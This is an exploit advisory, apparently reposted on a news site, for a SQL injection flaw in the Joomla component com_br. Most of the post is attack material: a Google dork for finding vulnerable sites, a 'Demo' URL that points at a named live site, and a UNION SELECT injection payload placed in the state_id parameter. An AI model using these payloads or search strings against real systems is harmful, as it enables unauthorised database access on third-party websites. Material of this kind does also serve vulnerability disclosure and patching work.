Home NewsJoomla Component (com_br) SQL Injection Vulnerability

Joomla Component (com_br) SQL Injection Vulnerability

11 Octobre 2011

################################################################################################
# Exploit Title: Joomla Component (com_br) SQL Injection Vulnerability
#
# Author : CoBRa_21
#
# Google Dork : inurl:index.php?option=com_br
#
# Demo: http://beginrecovery.com/beta/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=33
################################################################################################
#
# Exploit:
#
# http://127.0.0.1/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=33 (SQL)
#
# http://127.0.0.1/index.php?option=com_br&controller=resource&view=resource&task=resource_info&Itemid=8&state_id=-33 union select 0,1,version(),3